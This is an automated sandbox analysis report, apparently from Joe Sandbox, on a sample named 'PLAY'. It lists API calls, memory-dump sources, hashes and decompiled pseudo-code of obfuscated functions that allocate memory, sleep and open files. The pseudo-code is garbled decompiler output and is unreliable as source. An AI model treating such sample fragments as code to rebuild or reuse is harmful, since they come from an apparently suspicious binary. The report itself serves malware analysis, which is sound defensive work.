          0x00af758c
          0x00af7593
          0x00af7597
          0x00af7599
          0x00af7599
          0x00af759f
          0x00af759f
          0x00af75a2
          0x00af75a8
          0x00af75b1
          0x00af75b2
          0x00af75b2
          0x00af75b3
          0x00af75b8
          0x00af761c
          0x00af761c
          0x00af761f
          0x00af7625
          0x00af7629
          0x00af7634
          0x00af763f
          0x00af7645
          0x00af7645
          0x00af7648
          0x00af7648
          0x00af7648
          0x00af764c
          0x00af764e
          0x00af764e
          0x00af7651
          0x00af7654
          0x00af77de
          0x00af77e3
          0x00af77ed
          0x00000000
          0x00af77f9
          0x00af765a
          0x00af765a
          0x00af765a
          0x00af765f
          0x00af7662
          0x00af7666
          0x00af766c
          0x00af7670
          0x00af7670
          0x00af7678
          0x00af767d
          0x00af7687
          0x00af768e
          0x00af768e
          0x00af7691
          0x00af7691
          0x00af7691
          0x00af7694
          0x00af7697
          0x00af769a
          0x00af769e
          0x00af76a3
          0x00af76a5
          0x00af76a5
          0x00af76ab
          0x00af76ab
          0x00af76ae
          0x00af76ae
          0x00af76b5
          0x00af76bb
          0x00af76bc
          0x00af76bf
          0x00af76c1
          0x00af76c3
          0x00af76c3
          0x00af76c3
          0x00af76c4
          0x00af76c5
          0x00af76f2
          0x00af76f2
          0x00af76f4
          0x00af76f6
          0x00af76f7
          0x00af76f8
          0x00af76fb
          0x00af7701
          0x00af7709
          0x00af7713
          0x00af7715
          0x00af771c
          0x00af73b0
          0x00af73b0
          0x00af73b3
          0x00af73bb
          0x00af73bd
          0x00af73bd
          0x00af73c3
          0x00af73c6
          0x00af73cc
          0x00af73ce
          0x00af73d5
          0x00af73d6
          0x00af73d7
          0x00af73dc
          0x00af73dd
          0x00af76c7
          0x00af76c7
          0x00af76c9
          0x00af76cf
          0x00af76d1
          0x00af76d3
          0x00af76d5
          0x00af76d5
          0x00af76d5
          0x00af76d9
          0x00af76d9
          0x00af75ba
          0x00af75ba
          0x00af75ba
          0x00af75bb
          0x00af75bb
          0x00af75bc
          0x00af75bc
          0x00af75bc
          0x00af75c0
          0x00af75c0
          0x00000000
          0x00af75b8
          0x00af7560
          0x00af7522
          0x00af7524
          0x00af752a
          0x00af752c
          0x00af752e
          0x00af7530
          0x00af7530
          0x00af7534
          0x00000000

          APIs
          • Sleep.KERNELBASE(000001F4), ref: 00AF756E
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: 7a3c0370c2eaeaf3344a7fa1012350f65a44279a38008c12844cda8c7be229c5
          • Instruction ID: dae7f7a08370b86fbd26c76e59a49d7711a0700f2d016bd8ef164274b73bbc36
          • Opcode Fuzzy Hash: 7a3c0370c2eaeaf3344a7fa1012350f65a44279a38008c12844cda8c7be229c5
          • Instruction Fuzzy Hash: E1413B72D081898BCF05DBE8C9522ECBBB0DF41310F1841E9D954EB2D6E6384A198B92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF6FCB Relevance: 1.4, APIs: 1, Instructions: 105COMMON
          Download Yara Rule
          APIs
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AF6F75
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ErrorLast
          • String ID:
          • API String ID: 1452528299-0
          • Opcode ID: ae3fcf906094e825516e862e4db1956a3d9ffa772037f69950dc33863501fd9e
          • Instruction ID: bce5c38be77a75e80b9358ec6a1c98e1a5965f5a9a940038c34d1f34f3e205ec
          • Opcode Fuzzy Hash: ae3fcf906094e825516e862e4db1956a3d9ffa772037f69950dc33863501fd9e
          • Instruction Fuzzy Hash: E131A0A29042495FC701ABFCED862E87F61EF22334F540799FA224B1E7EA314115C722
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF76C3 Relevance: 1.3, APIs: 1, Instructions: 72sleepCOMMON
          Download Yara Rule
          APIs
          • Sleep.KERNELBASE(000001F4), ref: 00AF7713
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: 2582c94fbfb1b04ba4feed7ea1914cdb09d148be013615e81bd0d6b5f8804bb2
          • Instruction ID: 31975844ba5639dfb2ae7c5b92d3b491c0cc65da4c17965e58f007a4f250a4be
          • Opcode Fuzzy Hash: 2582c94fbfb1b04ba4feed7ea1914cdb09d148be013615e81bd0d6b5f8804bb2
          • Instruction Fuzzy Hash: C411EF3A91C1458ED712ABF4994A2FDB720EF12325F3D51AEE5105F653E920090E87E2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE95D4 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 63%
          			E00AE95D4(void* __eax, void* __ebx, void* __ecx, void* __esi, void* __fp0) {
				void* __ebp;
				short _t64;
				void* _t66;
				signed int _t71;
				signed short _t74;
				intOrPtr _t77;
				void* _t78;
				void* _t88;
				void* _t89;
				signed int _t107;
				void* _t110;
				void* _t111;
				void** _t113;
				void** _t120;
				intOrPtr _t133;
				intOrPtr _t134;
				void** _t135;
				void* _t141;
				void** _t142;
				void** _t144;
				void* _t148;
				intOrPtr _t150;
				signed int _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;
				void* _t161;
				void* _t164;
				void* _t165;
				intOrPtr* _t166;
				void* _t176;
				void* _t178;

				_t178 = __fp0;
				_t148 = __esi;
				_t110 = __ecx;
				asm("stosb");
				_t64 = 0x78;
				_pop(0xba000047);
				if(__ebx +  *(__eax + 0xa29f11d7 & 0x17ebfb80) <= 0) {
					while(1) {
						asm("in al, dx");
						_pop(ss);
						_pop(_t64);
						 *_t64 =  *_t64 + _t64;
						_t176 = _t133 - _t110;
						if(_t176 <= 0) {
							_t157 = _t157 + 0xa4;
						}
						_t157 = _t157 + 0xc;
						L10();
						asm("aaa");
						if(_t176 >= 0) {
							goto L12;
						}
						if(_t176 <= 0) {
							while(1) {
								asm("loopne 0x68");
								_t141 = _t141 + _t148;
								_t64 = _t64 + _t148;
								_t110 = _t110 - 1;
								if(_t110 == 0) {
									break;
								}
								_t133 = _t133 + 0xffffffff;
								asm("adc ebx, 0xffffffff");
								 *((char*)(_t154 - 0x41)) =  *((char*)(_t154 - 0x41)) + 0xe0;
							}
							 *((short*)(_t154 - 0x8e)) = _t64;
							 *((intOrPtr*)(_t154 - 0xc)) = 0xba000047;
							 *((intOrPtr*)(_t154 - 0x6c)) = _t133;
							_t157 = _t157 - 0xc;
							continue;
						} else {
							asm("adc eax, 0x48393a4");
							 *_t157 =  *_t157 + 0x47;
							return _t64;
						}
						goto L38;
					}
					goto L12;
				} else {
					_pop(__edx);
					 *__edx = fs;
					asm("in eax, dx");
					asm("ror dword [edx-0x44], 1");
					__eax = __eax ^  *(__edx - 0x7106291);
					__al = __al + 0x52;
					asm("arpl dx, bx");
					__edi = __ebp;
					 *0x8b35d903 =  *0x8b35d903 | 0x00b0d6a8;
					__eax = E00AEDEC0(__ebx, __ecx, __edi, __esi);
					L12:
					_t66 = VirtualAlloc(0, 0xffff, 0x1000, 4); // executed
					_t142 = _t66;
					 *(_t154 - 0x70) = _t142;
					 *(_t154 - 0xc0) =  *((intOrPtr*)(_t154 - 0x8e)) -  *((intOrPtr*)(_t154 - 0xa0)) +  *((intOrPtr*)(_t154 - 0xec));
					if(_t142 != 0) {
						_t134 =  *((intOrPtr*)(_t154 - 0x60));
						if( *(_t154 - 0x64) >= 0x4146) {
							_t71 =  *((intOrPtr*)(_t154 - 0x5c));
						} else {
							_t71 =  *(_t154 - 0x68) + _t134 +  *((intOrPtr*)(_t154 - 0xd0));
						}
						_t150 =  *((intOrPtr*)(_t154 - 0x8c));
						_t111 = 0x786;
						_t107 =  *((intOrPtr*)(_t154 - 0x43));
						 *(_t154 - 0x68) = _t71;
						 *_t142 = 0;
						do {
							_t111 = _t111 + 1;
							_t150 = _t150 + 0xffff;
							_t107 = _t107 + 1;
							_t74 =  *(_t154 - 0xc0) + _t134;
							 *(_t154 - 0x58) = _t74 & 0x0000ffff;
							 *(_t154 - 0xc0) = _t74;
						} while (_t111 < 0x78b);
						_t144 =  *(_t154 - 0x70);
						E00AFA532(_t144, 0x7fff,  *((intOrPtr*)(_t154 - 0x74)));
						_t158 = _t157 + 0xc;
						_t77 = E00B02A00( *((intOrPtr*)(_t154 - 0x6c)),  *((intOrPtr*)(_t154 - 0xc)),  *((intOrPtr*)(_t154 - 0x6c)),  *((intOrPtr*)(_t154 - 0xc)));
						_t151 =  *(_t154 - 0x64);
						_t113 = _t144;
						 *((intOrPtr*)(_t154 - 0x74)) = _t134;
						 *((intOrPtr*)(_t154 - 0x6c)) = _t77;
						_t135 =  &(_t113[0]);
						do {
							_t78 =  *_t113;
							_t113 =  &(_t113[0]);
						} while (_t78 != 0);
						if( *((short*)(_t144 + (_t113 - _t135 >> 1) * 2 - 2)) != 0x5c) {
							_push(_t154 - 0x10);
							E00AED7D0(_t107, 0xb0b994, 4, _t144, _t151);
							E00AFA596(_t144, 0x7fff, _t154 - 0x10);
							_t158 = _t158 - 8 + 0x18;
						}
						_push(_t154 - 0x3c);
						E00AED7D0(_t107, 0xb0b944, 0x16, _t144, _t151);
						_t160 = _t158 - 8 + 0xc;
						if( *((char*)(_t154 - 0x45)) != 0 || _t151 != 0) {
							 *((intOrPtr*)(_t154 - 0x78)) = ( *(_t154 - 0x58) & 0x0000ffff) + ( *(_t154 - 0x46) & 0x000000ff) + ( *(_t154 - 0x68) & 0x000000ff);
						}
						E00AFA596(_t144, 0x7fff, _t154 - 0x3c);
						_t161 = _t160 + 0xc;
						if( *((intOrPtr*)(_t154 - 0x74)) > 0 ||  *((intOrPtr*)(_t154 - 0x6c)) > 0x66) {
							 *(_t154 - 0x58) = 0;
						} else {
							asm("cdq");
							_t151 = 0x16;
							asm("cdq");
							asm("adc esi, edx");
							asm("adc esi, 0x0");
							 *(_t154 - 0x58) = 0x16;
						}
						_t88 = E00AF8BB0(_t144, _t154 - 0x3c, 0, 0x2c);
						_t120 = _t144;
						_push(0x80);
						_push(4);
						_t89 = E00AEE230(_t88, _t120, 0x40000000, _t144, _t151, _t178); // executed
						_t164 = _t161 + 8 - 8 + 0x14;
						 *(_t154 - 0x58) = _t89;
						if(_t89 != 0xffffffff) {
							_push(_t120);
							_push(_t154 - 0x40);
							_push(0x1f);
							_t89 = E00AEE380(_t89, _t107, _t89,  *((intOrPtr*)(_t154 - 0x80)), _t144, _t151); // executed
							_t164 = _t164 + 0xc;
						} else {
							 *((intOrPtr*)(_t154 - 0x7c)) = 0xfffffffe;
						}
						_t165 = _t164 - 0x10;
						if(0x79 <= 0x24) {
							_t165 = _t165 + 0x184;
						}
						_t166 = _t165 + 0x10;
						L36();
						_t145 = _t144 - 1;
						if(_t144 - 1 < 0) {
							 *_t89 = _t89 +  *_t89;
							FindCloseChangeNotification( *(_t154 - 0x58)); // executed
							E00AEE110(_t107,  *(_t154 - 0x70), _t145, _t151); // executed
							return E00AF7B30( *(_t154 - 8) ^ _t154, 0x24);
						} else {
							 *_t166 =  *_t166 + 0x14;
							return _t89;
						}
					} else {
						return E00AF7B30( *(_t154 - 8) ^ _t154);
					}
				}
				L38:
			}



































          0x00ae95d4
          0x00ae95d4
          0x00ae95d4
          0x00ae95d6
          0x00ae95e3
          0x00ae95e5
          0x00ae95e6
          0x00ae95a9
          0x00ae95a9
          0x00ae95b1
          0x00ae95b2
          0x00ae95b3
          0x00ae95b5
          0x00ae95b7
          0x00ae95b9
          0x00ae95b9
          0x00ae95bf
          0x00ae95c2
          0x00ae95c7
          0x00ae95c8
          0x00000000
          0x00000000
          0x00ae95ca
          0x00ae958f
          0x00ae958f
          0x00ae9591
          0x00ae9593
          0x00ae9596
          0x00ae9599
          0x00000000
          0x00000000
          0x00ae9586
          0x00ae9589
          0x00ae958c
          0x00ae958c
          0x00ae959b
          0x00ae95a2
          0x00ae95a5
          0x00ae95a8
          0x00000000
          0x00ae95cc
          0x00ae95cc
          0x00ae95cf
          0x00ae95d3
          0x00ae95d3
          0x00000000
          0x00ae95ca
          0x00000000
          0x00ae95e8
          0x00ae95e8
          0x00ae95ea
          0x00ae95ec
          0x00ae95f4
          0x00ae95fc
          0x00ae9605
          0x00ae9607
          0x00ae9609
          0x00ae960f
          0x00ae9614
          0x00ae9619
          0x00ae9627
          0x00ae9629
          0x00ae963d
          0x00ae9640
          0x00ae9649
          0x00ae9667
          0x00ae966d
          0x00ae967c
          0x00ae966f
          0x00ae9674
          0x00ae9674
          0x00ae967f
          0x00ae9686
          0x00ae968b
          0x00ae968e
          0x00ae9691
          0x00ae9697
          0x00ae969c
          0x00ae969d
          0x00ae96a0
          0x00ae96a8
          0x00ae96ad
          0x00ae96b0
          0x00ae96b7
          0x00ae96c2
          0x00ae96cb
          0x00ae96d3
          0x00ae96dd
          0x00ae96e2
          0x00ae96e5
          0x00ae96e7
          0x00ae96ea
          0x00ae96ed
          0x00ae96f0
          0x00ae96f0
          0x00ae96f3
          0x00ae96f6
          0x00ae9705
          0x00ae970f
          0x00ae9718
          0x00ae972a
          0x00ae972f
          0x00ae972f
          0x00ae973a
          0x00ae9743
          0x00ae9748
          0x00ae974f
          0x00ae976a
          0x00ae976a
          0x00ae9777
          0x00ae977c
          0x00ae9783
          0x00ae97ab
          0x00ae978b
          0x00ae978f
          0x00ae9792
          0x00ae979b
          0x00ae979e
          0x00ae97a3
          0x00ae97a6
          0x00ae97a6
          0x00ae97ba
          0x00ae97c7
          0x00ae97c9
          0x00ae97ce
          0x00ae97d3
          0x00ae97d8
          0x00ae97db
          0x00ae97e1
          0x00ae97ef
          0x00ae97f3
          0x00ae97f4
          0x00ae97f8
          0x00ae97fd
          0x00ae97e3
          0x00ae97e3
          0x00ae97e3
          0x00ae9800
          0x00ae9809
          0x00ae980b
          0x00ae980b
          0x00ae9811
          0x00ae9814
          0x00ae9819
          0x00ae981a
          0x00ae9836
          0x00ae983b
          0x00ae9841
          0x00ae985c
          0x00ae981c
          0x00ae981c
          0x00ae9820
          0x00ae9820
          0x00ae964b
          0x00ae965e
          0x00ae965e
          0x00ae9649
          0x00000000

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000FFFF,00001000,00000004), ref: 00AE9627
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 429277407fce172a5389c1bc2ad4f62599c0759d548f859fe9def6c8944fec6b
          • Instruction ID: 16f025566d64a67cd6ae441e5666be4573c91e4da625548d96fe612f2c4fafef
          • Opcode Fuzzy Hash: 429277407fce172a5389c1bc2ad4f62599c0759d548f859fe9def6c8944fec6b
          • Instruction Fuzzy Hash: 2D115572A003599BD731DBADEC527DEB3A0EF95320F1002A2D618DB2D1DB61A9C68B51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF0442 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
          Download Yara Rule
          APIs
          • Sleep.KERNELBASE(00003A98), ref: 00AF04C7
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: f7edbae5f9b4db782534a9cb8c89453eccdc32870a13e9bbe30bfa141963efa2
          • Instruction ID: 6c0b80b7be97bec4963394ba1e2bab63b32a65d0f9ba2939d33b6d27f52105b2
          • Opcode Fuzzy Hash: f7edbae5f9b4db782534a9cb8c89453eccdc32870a13e9bbe30bfa141963efa2
          • Instruction Fuzzy Hash: 4601ABA6D181C68FEF21BBE0AD029F87B618B22352F0800D5DB148A64BF225061D87DB
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE0A6 Relevance: 1.3, APIs: 1, Instructions: 51memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 50%
          			E00AEE0A6(void* __eax, void* __ebx, signed int __ecx, void* __esi) {
				void* __ebp;
				intOrPtr* _t10;
				void* _t11;
				signed int _t19;
				void* _t21;
				signed int _t27;
				void* _t30;
				signed int* _t31;

				_t19 = __ecx;
				asm("stosb");
				if(__ebx +  *(__eax + 0xa29f11d7 & 0x17ebfb80) <= 0) {
					asm("in al, dx");
					_pop(ss);
					_pop(_t10);
					 *_t10 =  *_t10 + _t10;
					__eflags = _t21 - __ecx;
					if(__eflags <= 0) {
						_t30 = _t30 + 0xa4;
					}
					_t31 = _t30 + 0xc;
					L7();
					asm("aaa");
					if(__eflags >= 0) {
						goto L9;
					} else {
						if(__eflags <= 0) {
							asm("clc");
							return E00AF7B30(_t19 ^ _t27);
						} else {
							asm("adc eax, 0x48393a4");
							 *_t31 =  *_t31 + 0x47;
							__eflags =  *_t31;
							return _t10;
						}
					}
				} else {
					_pop(__edx);
					 *__edx = fs;
					asm("in eax, dx");
					__eflags =  *((intOrPtr*)(__ebx + 0x51be352e)) - 0xffffffab;
					asm("ror dword [edx-0x44], 1");
					__eax = __eax ^  *(__edx - 0x7106291);
					__al = __al + 0x52;
					asm("arpl dx, bx");
					__edi = __ebp;
					 *0x8b35d903 =  *0x8b35d903 | 0x00b0d6a8;
					__eflags =  *0x8b35d903 | 0x00b0d6a8;
					__eax = E00AEDEC0(__ebx, __ecx, __edi, __esi);
					L9:
					_t11 = VirtualAlloc(0,  *(_t27 - 4), 0x1000,  *(_t27 + 0xc)); // executed
					return _t11;
				}
			}











          0x00aee0a6
          0x00aee0a8
          0x00aee0b8
          0x00aee07b
          0x00aee083
          0x00aee084
          0x00aee085
          0x00aee087
          0x00aee089
          0x00aee08b
          0x00aee08b
          0x00aee091
          0x00aee094
          0x00aee099
          0x00aee09a
          0x00000000
          0x00aee09c
          0x00aee09c
          0x00aee061
          0x00aee06f
          0x00aee09e
          0x00aee09e
          0x00aee0a1
          0x00aee0a1
          0x00aee0a5
          0x00aee0a5
          0x00aee09c
          0x00aee0ba
          0x00aee0ba
          0x00aee0bc
          0x00aee0be
          0x00aee0bf
          0x00aee0c6
          0x00aee0ce
          0x00aee0d7
          0x00aee0d9
          0x00aee0db
          0x00aee0e1
          0x00aee0e1
          0x00aee0e6
          0x00aee0eb
          0x00aee0f8
          0x00aee100
          0x00aee100

          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,?), ref: 00AEE0F8
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 847b47e700d2e129544c50791808ae10e149a2b955261daf562f617c5c7c11d4
          • Instruction ID: dcc6a7670d3dac11efb3fabd1c2f407139555f91ff43dc325e59dd9ceed2050b
          • Opcode Fuzzy Hash: 847b47e700d2e129544c50791808ae10e149a2b955261daf562f617c5c7c11d4
          • Instruction Fuzzy Hash: 15019E77A41245A7D730DEADBC437CC7790DFA5321F4001B1D758CB1A0E69255834741
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE160 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
          Download Yara Rule
          APIs
          • VirtualFree.KERNELBASE(?), ref: 00AEE1AB
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FreeVirtual
          • String ID:
          • API String ID: 1263568516-0
          • Opcode ID: b13d23c867bb43288d1e3cdc0ba044ff66e44199663e41800c52f94ac76056e2
          • Instruction ID: e0f13f3b3ab2445ff720e096d4a965b9481daa8ab967677310c547a0c1c6db00
          • Opcode Fuzzy Hash: b13d23c867bb43288d1e3cdc0ba044ff66e44199663e41800c52f94ac76056e2
          • Instruction Fuzzy Hash: B1F08B364481C48ACE11DBE9F8822D4BF30FE5527030943EADC884B713C32009598B82
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEE070 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
          Download Yara Rule
          C-Code - Quality: 51%
          			E00AEE070(void* __eax, signed int __ecx, long __edx, long _a8) {
				long _v8;
				intOrPtr* __ebp;
				signed int _t8;
				void* _t11;
				void* _t13;
				signed int _t16;
				signed int _t18;

				_t8 = __ecx;
				_t16 = _t18;
				_push(__ecx);
				_v8 = __edx;
				asm("in al, dx");
				__al = __al | 0x000000b9;
				ss = _t11;
				__eax = _t13;
				 *__eax =  *__eax + __al;
				__eflags = __edx - __ecx;
				if(__eflags <= 0) {
					__esp = __esp + 0xa4;
				}
				__esp = __esp + 0xc;
				L7();
				asm("aaa");
				if(__eflags >= 0) {
					__eax = VirtualAlloc(0, _v8, 0x1000, _a8); // executed
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				} else {
					if(__eflags <= 0) {
						asm("clc");
						return E00AF7B30(_t8 ^ _t16);
					} else {
						asm("adc eax, 0x48393a4");
						 *__esp =  *__esp + 0x47;
						__eflags =  *__esp;
						return __eax;
					}
				}
			}










          0x00aee070
          0x00aee071
          0x00aee073
          0x00aee077
          0x00aee07b
          0x00aee07c
          0x00aee083
          0x00aee084
          0x00aee085
          0x00aee087
          0x00aee089
          0x00aee08b
          0x00aee08b
          0x00aee091
          0x00aee094
          0x00aee099
          0x00aee09a
          0x00aee0f8
          0x00aee0fd
          0x00aee0ff
          0x00aee100
          0x00aee09c
          0x00aee09c
          0x00aee061
          0x00aee06f
          0x00aee09e
          0x00aee09e
          0x00aee0a1
          0x00aee0a1
          0x00aee0a5
          0x00aee0a5
          0x00aee09c

          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: fae3497d958a4bc4deb1345cf7058bd02cac4c40f3506a3b1f0453e82cc89ae7
          • Instruction ID: 0f9cf41c670311ea85367fb6ea3dbc74367315df2acab8e2f11f0b360cecc1d2
          • Opcode Fuzzy Hash: fae3497d958a4bc4deb1345cf7058bd02cac4c40f3506a3b1f0453e82cc89ae7
          • Instruction Fuzzy Hash: 15F027A3F4004822EA1065DA7C02BAEB709CBC1263F408276FB0C84180F9A30D1502D2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF74F7 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
          Download Yara Rule
          C-Code - Quality: 22%
          			E00AF74F7(void* __eax, signed int __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags, long long __fp0) {
				signed char _t76;
				signed int _t89;
				signed int _t93;
				signed int* _t94;
				void* _t97;
				signed int _t120;
				signed int _t125;
				void* _t131;
				signed int _t132;
				void* _t139;
				void* _t147;
				void* _t155;
				void* _t156;
				signed int _t159;
				signed int _t164;
				signed int* _t165;
				signed int _t172;
				void* _t173;
				signed int _t174;
				void* _t176;
				void* _t177;
				void* _t178;
				signed int* _t185;
				long long _t190;

				L0:
				while(1) {
					_t190 = __fp0;
					_t159 = __esi;
					_t155 = __edi;
					_t147 = __edx;
					_t130 = __ecx;
					_t120 = __ebx;
					_t172 = _t164;
					_pop(_t165);
					if(__eflags >= 0) {
						goto L26;
					}
					L18:
					__eflags = __edx - 0x67f3ed1;
					L26:
					_t121 = _t120 + _t147;
					__eflags = _t120 + _t147;
					_t76 = E00AEDEC0(_t121, _t130, _t155, _t159);
					_push(0x1f4);
					L27:
					asm("ror byte [ebx+0x4d8bdc45], 1");
					asm("hlt");
					 *((char*)(_t165 - 3)) =  *((char*)(_t165 - 3)) + 3;
					 *(_t165 - 0x24) = (_t76 & 0x000000ff) * 0x68;
					_t131 = _t130 + _t130 + _t130;
					 *((intOrPtr*)(_t165 - 2)) =  *((intOrPtr*)(_t165 - 2)) + _t131;
					_t173 = _t172 - 8;
					__eflags = 0x7ffe - 0x2da2;
					if(0x7ffe <= 0x2da2) {
						_t173 = _t173 + 0x107;
					}
					L29:
					_t174 = _t173 + 8;
					L32();
					asm("invalid");
					asm("int3");
					_t132 = _t131 + 1;
					__eflags = _t132;
					0x9312e8c9(_t165);
					if(_t132 < 0) {
						L33:
						_t159 =  *(_t165 - 0x10);
						_t120 =  *(_t165 - 0x24);
						_t133 =  *(_t165 - 4) & 0x000000ff;
						 *((intOrPtr*)(_t165 - 0x4c)) = 0x7ffe + _t132 * 2;
						 *((intOrPtr*)(_t165 - 0xc)) =  *((intOrPtr*)(_t165 - 0xc)) + 0xffffffffffff8cbc;
						 *((intOrPtr*)(_t165 - 0x50)) =  *((intOrPtr*)(_t165 - 0x38)) + ( *(_t165 - 4) & 0x000000ff) + _t133 * 2;
						_t89 =  *((intOrPtr*)(_t165 - 0x18)) + 8;
						__eflags = _t89;
						do {
							L34:
							__eflags =  *((intOrPtr*)(_t89 + 4)) - 1;
							if( *((intOrPtr*)(_t89 + 4)) == 1) {
								L35:
								__eflags =  *_t89;
								_t156 = _t89 - 8;
								if( *_t89 == 0) {
									L59:
									E00AF7800(_t120, _t156,  *((intOrPtr*)(_t165 - 0x58)), _t156, _t159);
